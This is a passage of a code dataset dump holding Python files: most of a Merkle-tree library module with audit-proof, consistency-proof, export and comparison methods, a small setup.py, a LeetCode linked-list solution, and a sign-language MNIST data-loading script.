self.leaves[index]\n except IndexError:\n raise NoPathException # Covers also the empty tree case\n\n else:\n\n initial_sign = +1\n if current_node.is_right_parent():\n initial_sign = -1\n\n path = [(initial_sign, current_node.digest)]\n start = 0\n\n while True:\n\n try:\n current_child = current_node.child\n\n except NoChildException:\n break\n\n else:\n\n if current_node.is_left_parent():\n next_hash = current_child.right.digest\n\n if current_child.is_left_parent():\n path.append((+1, next_hash))\n else:\n path.append((-1, next_hash))\n\n else:\n next_hash = current_child.left.digest\n\n if current_child.is_right_parent():\n path.insert(0, (-1, next_hash))\n else:\n path.insert(0, (+1, next_hash))\n start += 1\n\n current_node = current_child\n\n return start, tuple(path)\n\n\n def auditProof(self, arg):\n \"\"\"Response of the Merkle-tree to the request of providing an audit-proof based upon the provided argument\n\n :param arg: the record (if type is *str* or *bytes* or *bytearray*) or index of leaf (if type is *int*) where the\n computation of audit-proof must be based upon\n :type arg: str or bytes or bytearray or int\n :returns: audit-proof appropriately formatted along with its validation parameters (so that it can be passed in\n as the second argument to the ``validations.validateProof()`` function)\n :rtype: proof.Proof\n\n :raises InvalidProofRequest: if the provided argument's type is not as prescribed\n \"\"\"\n\n if type(arg) not in (int, str, bytes, bytearray):\n raise InvalidProofRequest\n\n elif type(arg) is int:\n index = arg\n else:\n # ~ arg is of type str, or bytes or bytearray; in this case, detect the index\n # ~ of the first leaf having recorded the inserted argument; if no such leaf\n # ~ exists (i.e., the inserted argument has not been encrypted into the tree),\n # ~ set index equal to -1 so that a NoPathException be subsequently raised\n index = -1\n count = 0\n _hash = self.hash(arg)\n _leaves = (leaf for leaf in self.leaves)\n while True:\n\n try:\n _leaf = next(_leaves)\n except StopIteration:\n break\n\n else:\n if _hash == _leaf.digest:\n index = count\n break\n count += 1\n\n try:\n # Calculate proof path\n proof_index, audit_path = self.audit_path(index=index)\n\n except NoPathException: # Includes case of negative `arg`\n\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=-1,\n proof_path=()\n )\n else:\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=proof_index,\n proof_path=audit_path\n )\n\n\n# --------------------------- Consistency-proof utils ---------------------------\n\n\n def subroot(self, start, height):\n \"\"\"Returns the root of the unique *full* binary subtree of the Merkle-tree, whose leftmost leaf is located\n at the provded position ``start`` and whose height is equal to the provded ``height``\n\n :param start: index (zero based) of leaf where detection of subtree should start from\n :type start: int\n :param height: height of candidate subtree to be detected\n :type height: int\n :returns: root of the detected subtree\n :rtype: nodes._Node\n\n :raises NoSubtreeException: if no subtree does exists for the given parameters\n \"\"\"\n\n # Detect candidate subroot\n\n try:\n subroot = self.leaves[start]\n\n except IndexError:\n raise NoSubtreeException\n\n i = 0\n while i < height:\n try:\n next_node = subroot.child\n\n except NoChildException:\n raise NoSubtreeException\n\n else:\n\n if next_node.left is not subroot:\n raise NoSubtreeException\n\n subroot = subroot.child\n i += 1\n\n # ~ Verify existence of *full* binary subtree for the above\n # ~ detected candidate subroot\n\n right_parent = subroot\n i = 0\n\n while i < height:\n\n if isinstance(right_parent, Leaf):\n raise NoSubtreeException\n\n right_parent = right_parent.right\n i += 1\n\n return subroot\n\n def principal_subroots(self, sublength):\n \"\"\"Detects and returns in corresponding order the roots of the *successive*, *rightmost*, *full* binary\n subtrees of maximum (and thus decreasing) length, whose lengths sum up to the provided argument\n\n Returned nodes are prepended with a sign (``+1`` or ``-1``), carrying information used in the generation of\n consistency-proofs after extracting hashes\n\n :param sublength: a non-negative integer smaller than or equal to the Merkle-tree's current length, such that\n the corresponding sequence of subroots exists\n :returns: The signed roots of the detected subtrees, whose hashes are to be used for the generation\n of consistency-proofs\n :rtype: list<(+1/-1, nodes._Node)>\n\n :raises NoPrincipalSubrootsException: if the provided ``sublength`` does not fulfill the prescribed conditions\n \"\"\"\n\n if sublength < 0:\n raise NoPrincipalSubrootsException # Mask negative input case as incompatibility\n\n principal_subroots = []\n powers = decompose(sublength)\n start = 0\n for _power in powers:\n\n try:\n _subroot = self.subroot(start, _power)\n\n except NoSubtreeException:\n raise NoPrincipalSubrootsException # Incompatibility issue detected\n\n else:\n try:\n _child = _subroot.child\n _grandchild = _child.child\n\n except NoChildException:\n\n if _subroot.is_left_parent():\n principal_subroots.append((+1, _subroot))\n else:\n principal_subroots.append((-1, _subroot))\n\n else:\n\n if _child.is_left_parent():\n principal_subroots.append((+1, _subroot))\n else:\n principal_subroots.append((-1, _subroot))\n\n finally:\n start += 2**_power\n\n if len(principal_subroots) > 0:\n principal_subroots[-1] = (+1, principal_subroots[-1][1]) # Modify last sign\n\n return principal_subroots\n\n\n def minimal_complement(self, subroots):\n \"\"\"Complements optimally the subroot hashes detected by ``.principal_subroots`` with all necessary\n interior hashes of the Merkle-tree, so that a full consistency-path can be generated\n\n :param subroots: output of the ``.principal_subroots()`` method\n :type subroots: list\n :returns: a list of signed hashes complementing optimally provided input,\n so that a full consistency-path be generated\n :rtype: list<(+1/-1, bytes)>\n \"\"\"\n if len(subroots) == 0:\n return self.principal_subroots(self.length)\n\n complement = []\n\n while True:\n try:\n subroots[-1][1].child\n\n except NoChildException:\n break\n\n else:\n\n _subroot = subroots[-1][1]\n\n if _subroot.is_left_parent():\n\n if _subroot.child.is_right_parent():\n complement.append((-1, _subroot.child.right))\n else:\n complement.append((+1, _subroot.child.right))\n\n subroots = subroots[:-1]\n\n else:\n subroots = subroots[:-2]\n\n subroots.append((+1, _subroot.child))\n\n return complement\n\n def consistency_path(self, sublength):\n \"\"\"Computes and returns the main body for the consistency-proof requested for the provided parameters\n\n Body of a consistency-proof consist of a *consistency-path* (a sequence of signed hashes) and a *proof-index*\n (the position within the above sequence where a subsequent proof-validation should start from)\n\n :param sublength: length of a presumably valid previous state of the Merkle-tree\n :type sublength: int\n :returns: starting position for application of hashing along with a tuple of hashes signed with ``-1`` (leftmost\n hashes for inclusion test to be performed by the Merkle-tree itself) and a tuple of signed hashes for\n hash test to be performed from the Client's Side (the sign ``-1``, resp. ``+1`` indicating pairing\n with the left resp. right neigbour during proof validation)\n :rtype: (int, tuple<(-1, bytes)>, tuple<(+1/-1 bytes)>)\n\n :raises NoPathException: if the provided ``sublength`` is non-positive or no subroot sequence corresponds to it\n (i.e., if a ``NoPrincipalSubrootsException`` is implicitely raised)\n \"\"\"\n if sublength < 0 or self.length == 0:\n raise NoPathException\n\n try:\n left_subroots = self.principal_subroots(sublength)\n\n except NoPrincipalSubrootsException:\n raise NoPathException # Incompatibility issue detected\n\n else:\n\n right_subroots = self.minimal_complement([_ for _ in left_subroots])\n all_subroots = left_subroots + right_subroots\n\n if right_subroots == [] or left_subroots == []:\n\n all_subroots = [(-1, _[1]) for _ in all_subroots] # Reset all signs to minus\n proof_index = len(all_subroots) - 1 # Will start multi-hashing from endpoint\n\n else:\n proof_index = len(left_subroots) - 1 # Will start multi-hashing from midpoint\n\n # Collect sign-hash pairs\n\n left_path = tuple([(-1, _[1].digest) for _ in left_subroots])\n full_path = tuple([(_[0], _[1].digest) for _ in all_subroots])\n\n return proof_index, left_path, full_path\n\n\n def consistencyProof(self, oldhash, sublength):\n \"\"\"Response of the Merkle-tree to the request of providing a consistency-proof for the provided parameters\n\n Arguments of this function amount to a presumed previous state (root-hash and length) of the Merkle-tree\n\n :param oldhash: root-hash of a presumably valid previous state of the Merkle-tree\n :type oldhash: bytes\n :param sublength: presumable length (number of leaves) for the above previous state of the Merkle-tree\n :type sublength: int\n :returns: consistency-proof appropriately formatted along with its validation parameters (so that it\n can be passed in as the second argument to the ``validations.validateProof()`` function)\n :rtype: proof.Proof\n\n .. note:: If no proof-path corresponds to the provided parameters (i.e., a ``NoPathException`` is raised implicitely)\n or the provided parameters do not correpond to a valid previous state of the Merkle-tree (i.e., the\n corresponding inclusion-test fails), then the proof generated contains an empty proof-path, or, equivalently\n a negative proof-index ``-1`` is inscribed in it, so that it is predestined to be found invalid.\n\n :raises InvalidProofRequest: if the type of any of the provided arguments is not as prescribed\n \"\"\"\n\n if type(oldhash) is not bytes or type(sublength) is not int or sublength <= 0:\n raise InvalidProofRequest\n\n try:\n # Calculate proof path\n proof_index, left_path, full_path = self.consistency_path(sublength=sublength)\n\n except NoPathException: # Includes the empty-tree case\n\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=-1,\n proof_path=()\n )\n\n # Inclusion test\n\n if oldhash == self.multi_hash(signed_hashes=left_path, start=len(left_path) - 1):\n\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=proof_index,\n proof_path=full_path\n )\n else:\n return Proof(\n provider=self.uuid,\n hash_type=self.hash_type,\n encoding=self.encoding,\n security=self.security,\n proof_index=-1,\n proof_path=()\n )\n\n# ------------------------------ Inclusion tests ------------------------------\n\n def inclusionTest(self, oldhash, sublength):\n \"\"\"Verifies that the parameters provided correspond to a valid previous state of the Merkle-tree\n\n :param oldhash: root-hash of a presumably valid previous state of the Merkle-tree\n :type oldhash: bytes\n :param sublength: length (number of leaves) for the afore-mentioned previous state of the Merkle-tree\n :type sublength: int\n :returns: ``True`` if the appropriate path of negatively signed hashes, generated implicitely for the provided\n ``sublength``, leads indeed to the provided ``oldhash``; otherwise ``False``\n :rtype: bool\n\n :raises InvalidProofRequest: if the type of any of the provided arguments is not as prescribed\n \"\"\"\n\n if type(oldhash) is not bytes or type(sublength) is not int or sublength < 0:\n raise InvalidTypesException\n\n if sublength == 0:\n raise InvalidComparison\n\n if sublength <= len(self.leaves):\n\n # Generate corresponding path of negatively signed hashes\n\n left_roots = self.principal_subroots(sublength)\n left_path = tuple([(-1, _[1].digest) for _ in left_roots])\n\n # Perform hash-test\n\n return oldhash == self.multi_hash(signed_hashes=left_path, start=len(left_path) - 1)\n\n else: # sublength exceeds the tree's current length (includes the empty-tree case)\n\n return False\n\n\n# --------------------------------- Encryption ---------------------------\n\n\n def encryptRecord(self, record):\n \"\"\"Updates the Merkle-tree by storing the hash of the inserted record in a newly-created leaf,\n restrucuring the tree appropriately and recalculating all necessary interior hashes\n\n :param record: the record whose hash is to be stored into a new leaf\n :type record: str or bytes or bytearray\n :returns: ``0`` if the provided ``record`` was successfully encrypted, ``1`` othewise\n :rtype: int\n\n .. note:: Return-value ``1`` means that ``UndecodableRecordError`` has been implicitely raised\n \"\"\"\n\n try:\n self.update(record=record)\n\n except UndecodableRecordError:\n return 1\n\n return 0\n\n\n def encryptFileContent(self, file_path):\n \"\"\"Encrypts the provided file as a single new leaf into the Merkle-tree\n\n More accurately, it updates the Merkle-tree with *one* newly-created leaf (cf. doc of the ``.update()`` method)\n storing the digest of the provided file's content\n\n :param file_path: relative path of the file under encryption with respect to the current working directory\n :type file_path: str\n :returns: ``0`` if the provided file was successfully encrypted, ``1`` othewise\n :rtype: int\n\n .. note:: Return-value ``1`` means that ``UndecodableRecordError`` has been implicitely raised\n\n :raises FileNotFoundError: if the specified file does not exist\n \"\"\"\n try:\n with open(os.path.abspath(file_path), mode='r') as _file:\n with contextlib.closing(\n mmap.mmap(\n _file.fileno(),\n 0,\n access=mmap.ACCESS_READ\n )\n ) as _buffer:\n\n try:\n self.update(record=_buffer.read())\n\n except UndecodableRecordError:\n return 1\n else:\n return 0\n\n except FileNotFoundError:\n raise\n\n\n def encryptFilePerLog(self, file_path):\n \"\"\"Encrypts per log the data of the provided file into the Merkle-tree\n\n More accurately, it successively updates the Merkle-tree (cf. doc of the ``.update()`` method)\n with each line of the provided file in the respective order\n\n :param file_path: relative path of the file under enryption with respect to the current working directory\n :type file_path: str\n :returns: ``0`` if the provided file was successfully encrypted, ``1`` othewise\n :rtype: int\n\n .. note:: Return-value ``1`` means that some line of the provided log-file is undecodable with the Merkle-tree's\n encoding type (i.e., a ``UnicodeDecodeError`` has been implicitely raised)\n\n :raises FileNotFoundError: if the specified file does not exist\n \"\"\"\n\n absolute_file_path = os.path.abspath(file_path)\n\n try:\n with open(absolute_file_path, mode='r') as _file:\n buffer = mmap.mmap(\n _file.fileno(),\n 0,\n access=mmap.ACCESS_READ\n )\n\n except FileNotFoundError:\n raise\n\n else:\n\n records = []\n\n while True:\n _record = buffer.readline()\n\n if not _record:\n break\n\n else:\n\n try:\n _record = _record.decode(self.encoding)\n except UnicodeDecodeError:\n return 1\n\n else:\n records.append(_record)\n\n tqdm.write('')\n\n # Perform line by line encryption\n\n for _record in tqdm(records, desc='Encrypting log file', total=len(records)):\n self.update(record=_record)\n\n tqdm.write('Encryption complete\\n')\n\n return 0\n\n\n def encryptObject(self, object, sort_keys=False, indent=0):\n \"\"\"Encrypts the provided object as a single new leaf into the Merkle-tree\n\n More accurately, it updates (cf. doc of the ``.update()`` method) the Merkle-tree with *one* newly-created leaf\n storing the digest of the provided object's stringified version\n\n :param object: the JSON entity under encryption\n :type objec: dict\n :param sort_keys: [optional] Defaults to ``False``. If ``True``, then the object's keys get alphabetically sorted\n before its stringification.\n :type sort_keys: bool\n :param indent: [optional] Defaults to ``0``. Specifies key indentation upon stringification of the provided object.\n :type indent: int\n \"\"\"\n\n self.update(\n record=json.dumps(\n object,\n sort_keys=sort_keys,\n indent=indent\n )\n )\n\n\n def encryptObjectFromFile(self, file_path, sort_keys=False, indent=0):\n \"\"\"Encrypts the object within the provided ``.json`` file as a single new leaf into the Merkle-tree\n\n More accurately, the Merkle-tree is updated with *one* newly-created leaf (cf. doc of the ``.update()`` method)\n storing the digest of the stringified version of the object loaded from within the provided file\n\n :param file_path: relative path of a ``.json`` file with respect to the current working directory,\n containing *one* JSON entity\n :type file_path: str\n :param sort_keys: [optional] Defaults to ``False``. If ``True``, then the object's keys get alphabetically sorted\n before its stringification\n :type sort_keys: bool\n :param indent: [optional] Defaults to ``0``. Specifies key indentation upon stringification of the object\n under encryption\n :type indent: int\n\n :raises FileNotFoundError: if the specified file does not exist\n :raises JSONDecodeError: if the specified file could not be deserialized\n \"\"\"\n\n try:\n with open(os.path.abspath(file_path), 'rb') as _file:\n object = json.load(_file)\n\n except (FileNotFoundError, JSONDecodeError):\n raise\n\n else:\n self.update(\n record=json.dumps(\n object,\n sort_keys=sort_keys,\n indent=indent\n )\n )\n\n\n def encryptFilePerObject(self, file_path, sort_keys=False, indent=0):\n \"\"\"Encrypts per object the data of the provided ``.json`` file into the Merkle-tree\n\n More accurately, it successively updates the Merkle-tree (cf. doc of the ``.update()`` method) with each newly\n created leaf storing the digest of the respective JSON entity in the list loaded from the provided file\n\n :param file_path: relative path of a ``.json`` file with respect to the current working directory,\n containing a *list* of JSON entities\n :type file_path: str\n :param sort_keys: [optional] Defaults to ``False``. If ``True``, then the all objects' keys get alphabetically sorted\n before stringification\n :type sort_keys: bool\n :param indent: [optional] Defaults to ``0``. Specifies uniform key indentation upon stringification of objects\n :type indent: int\n\n :raises FileNotFoundError: if the specified file does not exist\n :raises JSONDecodeError: if the specified file could not be deserialized\n :raises WrongJSONFormat: if the JSON object loaded from within the provided file is not a list\n \"\"\"\n\n try:\n with open(os.path.abspath(file_path), 'rb') as _file:\n objects = json.load(_file)\n\n except (FileNotFoundError, JSONDecodeError):\n raise\n\n if type(objects) is not list:\n raise WrongJSONFormat\n\n for _object in objects:\n self.update(\n record=json.dumps(\n _object,\n sort_keys=sort_keys,\n indent=indent\n )\n )\n\n\n# ------------------------ Export to and load from file ------------------\n\n def export(self, file_path):\n \"\"\"Creates a ``.json`` file at the provided path and exports the minimum required information into it, so that the\n Merkle-tree can be reloaded in its current state from that file\n\n The final file will store a JSON entity with keys ``header`` (containing the parameters ``hash_type``, ``encoding``,\n and ``security``) and ``hashes``, mapping to the digests currently stored by the tree's leaves in respective order\n\n .. note:: If the provided path does not end with ``.json``, then this extension is appended to it before exporting\n .. warning:: If a file exists already for the provided path (after possibly extending with ``.json``, see above),\n then it gets overwritten\n\n :param file_path: relative path of the file to export to with respect to the current working directory\n :type file_path: str\n \"\"\"\n\n with open('%s.json' % file_path if not file_path.endswith('.json') else file_path, 'w') as _file:\n json.dump(\n self.serialize(),\n _file,\n indent=4\n )\n\n @staticmethod\n def loadFromFile(file_path):\n \"\"\"Loads a Merkle-tree from the provided file, the latter being the result of an export (cf. the ``.export()`` method)\n\n :param file_path: relative path of the file to load from with respect to the current working directory\n :type file_path: str\n :returns: the Merkle-tree laoded from the provided file\n :rtype: tree.MerkleTree\n\n :raises FileNotFoundError: if the specified file does not exist\n :raises JSONDecodeError: if the specified file could not be deserialized\n :raises WrongJSONFormat: if the JSON object loaded from within is not a Merkle-tree export (cf. the ``.export()`` method)\n \"\"\"\n try:\n with open(file_path, 'r') as _file:\n loaded_object = json.load(_file)\n except (FileNotFoundError, JSONDecodeError):\n raise\n\n try:\n _header = loaded_object['header']\n _tree = MerkleTree(\n hash_type=_header['hash_type'],\n encoding=_header['encoding'],\n security=_header['security']\n )\n except KeyError:\n raise WrongJSONFormat\n\n tqdm.write('\\nFile has been loaded')\n for hash in tqdm(loaded_object['hashes'], desc='Retreiving tree...'):\n _tree.update(digest=hash)\n\n tqdm.write('Tree has been retreived')\n\n return _tree\n\n# --------------------------------- Comparison ---------------------------\n\n def __eq__(self, other):\n \"\"\"Implements the ``==`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n\n if not other:\n return not self\n else:\n return True if not self else self.rootHash == other.rootHash\n\n def __ne__(self, other):\n \"\"\"Implements the ``!=`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n\n if not other:\n return self.__bool__()\n else:\n return True if not self else self.rootHash != other.rootHash\n\n def __ge__(self, other):\n \"\"\"Implements the ``>=`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n\n if not other:\n return True\n else:\n return False if not self else self.inclusionTest(other.rootHash, other.length)\n\n def __le__(self, other):\n \"\"\"Implements the ``<=`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n else:\n return other.__ge__(self)\n\n def __gt__(self, other):\n \"\"\"Implements the ``>`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n\n if not other:\n return self.__bool__()\n elif not self or self.rootHash == other.rootHash:\n return False\n else:\n return self.inclusionTest(other.rootHash, other.length)\n\n def __lt__(self, other):\n \"\"\"Implements the ``<`` operator\n\n :param other: the Merkle-tree to compare with\n :type other: tree.MerkleTree\n\n :raises InvalidComparison: if compared with an object that is not instance of the ``tree.MerkleTree`` class\n \"\"\"\n if not isinstance(other, self.__class__):\n raise InvalidComparison\n else:\n return other.__gt__(self)\n\n# ------------------------------- Representation -------------------------\n\n def __repr__(self):\n \"\"\"Overrides the default implementation\n\n Sole purpose of this function is to easily print info about the Merkle-treee by just invoking it at console\n\n .. warning:: Contrary to convention, the output of this implementation is *not* insertible to the ``eval()`` function\n \"\"\"\n\n return '\\n uuid : {uuid}\\\n \\n\\\n \\n hash-type : {hash_type}\\\n \\n encoding : {encoding}\\\n \\n security : {security}\\\n \\n\\\n \\n root-hash : {root_hash}\\\n \\n\\\n \\n length : {length}\\\n \\n size : {size}\\\n \\n height : {height}\\n'.format(\n uuid=self.uuid,\n hash_type=self.hash_type.upper().replace('_', '-'),\n encoding=self.encoding.upper().replace('_', '-'),\n security='ACTIVATED' if self.security else 'DEACTIVATED',\n root_hash=self.rootHash.decode(self.encoding) if self else NONE,\n length=self.length,\n size=self.size,\n height=self.height\n )\n\n def __str__(self, indent=3):\n \"\"\"Overrides the default implementation.\n\n Designed so that inserting the Merkle-tree as an argument to ``print()`` displays it in a terminal friendly way.\n Resembles the output of the ``tree`` command at Unix based platforms.\n\n :param indent: [optional] Defaults to ``3``. The horizontal depth at which each level will be indented with\n respect to its previous one\n :type indent: int\n :rtype: str\n\n .. note:: The left parent of each node is printed *above* the right one\n \"\"\"\n try:\n _root = self.root\n except EmptyTreeException:\n return NONE_BAR\n\n return _root.__str__(indent=indent, encoding=self.encoding)\n\n# ------------------------------- Serialization --------------------------\n\n def serialize(self):\n \"\"\" Returns a JSON entity with the Merkle-trees's current characteristics and hashes currently stored by its leaves.\n\n :rtype: dict\n\n .. note:: This method does *not* serialize the tree structure itself, but only the info about the tree's fixed configs\n and current state, so that the tree be retrievable\n \"\"\"\n return MerkleTreeSerializer().default(self)\n\n def JSONstring(self):\n \"\"\"Returns a nicely stringified version of the Merkle-tree's JSON serialized form\n\n .. note:: The output of this method is to be passed into the ``print()`` function\n\n :rtype: str\n \"\"\"\n return json.dumps(\n self,\n cls=MerkleTreeSerializer,\n sort_keys=True,\n indent=4\n )\n\n# ---------------------------------- Clearance ---------------------------\n\n def clear(self):\n \"\"\"Deletes all nodes of the Merkle-tree, setting its ``root`` equal to ``None``\n \"\"\"\n self.leaves = []\n self.nodes = set()\n self._root = None\n","sub_path":"pymerkle/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":43808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"82094401","text":"from setuptools import setup, find_packages\n\n__version__ = '2021.1'\n\nsetup(name='microndla',\n version=__version__,\n py_modules=[\"microndla\"],\n description=\"Micron Deep Learning Acceleration SDK\",\n packages=find_packages(),\n install_requires=[\n \"numpy>=1.14.2\",\n \"Pillow>=5.0\",\n])\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"113499891","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def swapPairs(self, head):\n current = head\n prev = None\n out = None\n if head is None or head.next is None:\n return head\n while current is not None and current.next is not None:\n #assuming node.val cannot be changed\n swap = current.next\n current.next = swap.next\n swap.next = current\n if prev is not None:\n prev.next = swap\n else:\n out = swap\n prev = current\n current = current.next\n return out","sub_path":"LeetCode/Algorithms/swap_pair_nodes.py","file_name":"swap_pair_nodes.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566711095","text":"''' This file is to preprocess the images in order to use the CNN\r\n provided this this folder. This file should run first before\r\n any other file. \r\n\r\n The inspiration on this file came from the Tensor Flow Examples:\r\n https://github.com/tensorflow/tensorflow/blob/r1.6/tensorflow/contrib/learn/python/learn/datasets/mnist.py\r\n # Copyright 2016 The TensorFlow Authors. All Rights Reserved.\r\n #\r\n # Licensed under the Apache License, Version 2.0 (the \"License\");\r\n # you may not use this file except in compliance with the License.\r\n # You may obtain a copy of the License at\r\n #\r\n # http://www.apache.org/licenses/LICENSE-2.0\r\n #\r\n # Unless required by applicable law or agreed to in writing, software\r\n # distributed under the License is distributed on an \"AS IS\" BASIS,\r\n # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n # See the License for the specific language governing permissions and\r\n # limitations under the License.\r\n # ==============================================================================\r\n\r\n We did not use the code 100% but we got how the input images should be. \r\n\r\n Note that the input images are from a data set that can be found: \r\n https://www.kaggle.com/datamunge/sign-language-mnist/data\r\n\r\n Include in the README folder how to preprocess data\r\n'''\r\n\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport numpy as np\r\nimport csv\r\nimport collections\r\n\r\nfrom tensorflow.python.framework import dtypes\r\nfrom tensorflow.python.framework import random_seed\r\n\r\n'''\r\n There are 24 classes in our data (The whole alphabet excluding j & z which uses motion)\r\n The data comes in a CVS. \r\n'''\r\n\r\n\r\ndef dense_to_one_hot(labels_dense, num_classes):\r\n \"\"\"Convert class labels from scalars to one-hot vectors.\"\"\"\r\n num_labels = labels_dense.shape[0]\r\n index_offset = np.arange(num_labels) * num_classes\r\n labels_one_hot = np.zeros((num_labels, num_classes))\r\n labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1\r\n return labels_one_hot\r\n\r\ndef extract_data(filepath):\r\n ''' We will extract the Data from the csv file '''\r\n images = []\r\n labels = []\r\n firstline = True\r\n\r\n with open(filepath) as csvfile:\r\n reader = csv.reader(csvfile)\r\n for row in reader:\r\n if firstline: #skip first line\r\n firstline = False\r\n continue\r\n\r\n row_list = list(row)\r\n images.append(row_list[1:])\r\n\r\n # Relabel labels (since labels 9(J) & 25(Z) don't exist)\r\n if int(row[0]) > 9:\r\n labels.append(int(row[0])-1)\r\n else:\r\n labels.append(int(row[0]))\r\n\r\n images = np.array(images).astype(int)\r\n labels = np.array(labels).astype(int)\r\n \r\n return images, labels\r\n \r\n\r\n\r\n# def extract_labels(f, one_hot = False, num_classes = 5):\r\n\r\nclass DataSet(object):\r\n ''' Making the Dataset Class for training data and testing data'''\r\n def __init__(self,images,labels,dtype = dtypes.float32,reshape = False,seed = None ):\r\n # If seed is not set, use whatever graph level seed is returned\r\n seed1, seed2 = random_seed.get_seed(seed)\r\n np.random.seed(seed1 if seed is None else seed2)\r\n dtype = dtypes.as_dtype(dtype).base_dtype\r\n\r\n if dtype not in (dtypes.uint8, dtypes.float32):\r\n raise TypeError('Invalid image dtype %r, expected uint8 or float32' % dtype)\r\n\r\n assert images.shape[0] == labels.shape[0], ('images.shape: %s labels.shape: %s' % (images.shape, labels.shape))\r\n \r\n self._num_examples = images.shape[0]\r\n\r\n # Convert shape from [num explames, rows, columns, depth]\r\n # to [num examples, rows*columns] (assuming depth ==1)\r\n if reshape:\r\n # assert images.shape[3] == 1\r\n images = images.reshape(images.shape[0], images.shape[1] * images.shape[2])\r\n\r\n # Convert from [0, 255] -> [0.0, 1.0]\r\n if dtype == dtypes.float32:\r\n images = images.astype(np.float32)\r\n images = np.multiply(images, 1.0/255.0)\r\n\r\n self._images = images\r\n self._labels = labels\r\n self._epochs_completed = 0\r\n self._index_in_epoch = 0\r\n\r\n ''' Next few definitions are to get the variables from the class '''\r\n @property\r\n def images(self):\r\n return self._images\r\n\r\n @property\r\n def labels(self):\r\n return self._labels\r\n\r\n @property\r\n def num_examples(self):\r\n return self._num_examples\r\n\r\n @property\r\n def epochs_completed(self):\r\n return self._epochs_completed\r\n\r\n ''' Return the next batch_size exaamples from this data set. '''\r\n def next_batch(self, batch_size, shuffle=True):\r\n \r\n start = self._index_in_epoch\r\n # Shuffle for the first epoch\r\n if self._epochs_completed == 0 and start == 0 and shuffle:\r\n perm0 = np.arange(self._num_examples)\r\n np.random.shuffle(perm0)\r\n self._images = self.images[perm0]\r\n self._labels = self.labels[perm0]\r\n # Go to the next epoch\r\n if start + batch_size > self._num_examples:\r\n # Finished epoch\r\n self._epochs_completed += 1\r\n # Get the rest examples in this epoch\r\n rest_num_examples = self._num_examples - start\r\n images_rest_part = self._images[start:self._num_examples]\r\n labels_rest_part = self._labels[start:self._num_examples]\r\n # Shuffle the data\r\n if shuffle:\r\n perm = np.arange(self._num_examples)\r\n np.random.shuffle(perm)\r\n self._images = self.images[perm]\r\n self._labels = self.labels[perm]\r\n # Start next epoch\r\n start = 0\r\n self._index_in_epoch = batch_size - rest_num_examples\r\n end = self._index_in_epoch\r\n images_new_part = self._images[start:end]\r\n labels_new_part = self._labels[start:end]\r\n return np.concatenate(\r\n (images_rest_part, images_new_part), axis=0), np.concatenate(\r\n (labels_rest_part, labels_new_part), axis=0)\r\n else:\r\n self._index_in_epoch += batch_size\r\n end = self._index_in_epoch\r\n return self._images[start:end], self._labels[start:end]\r\n\r\n\r\n\r\ndef load_dataset(one_hot=True,\r\n dtype=dtypes.float32,\r\n reshape=False, # We make it false , since the csv file already comes reshaped\r\n validation_size=0,\r\n seed=None):\r\n class DataSets(object):\r\n pass\r\n \r\n data_sets = DataSets()\r\n TRAIN = './Data/sign_mnist_train.csv'\r\n TEST = './Data/sign_mnist_test.csv'\r\n n_classes = 24\r\n\r\n # Get Training Images and labels\r\n train_images, train_labels = extract_data(TRAIN)\r\n\r\n # Get Testing Images and labels\r\n test_images, test_labels = extract_data(TEST)\r\n\r\n if(one_hot):\r\n train_labels = dense_to_one_hot(train_labels, n_classes)\r\n test_labels = dense_to_one_hot(test_labels, n_classes)\r\n\r\n if not 0 <= validation_size <= len(train_images):\r\n raise ValueError('Validation size should be between 0 and {}. Received: {}.'\r\n .format(len(train_images), validation_size))\r\n\r\n validation_images = train_images[:validation_size]\r\n validation_labels = train_labels[:validation_size]\r\n train_images = train_images[validation_size:]\r\n train_labels = train_labels[validation_size:]\r\n\r\n\r\n\r\n options = dict(dtype=dtype, reshape=reshape, seed=seed)\r\n\r\n data_sets.train = DataSet(train_images, train_labels, **options)\r\n data_sets.validation = DataSet(validation_images, validation_labels, **options)\r\n data_sets.test = DataSet(test_images, test_labels, **options)\r\n \r\n return data_sets\r\n\r\n","sub_path":"mnistDataset.py","file_name":"mnistDataset.py","file_ext":"py","file_size_in_byte":7561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 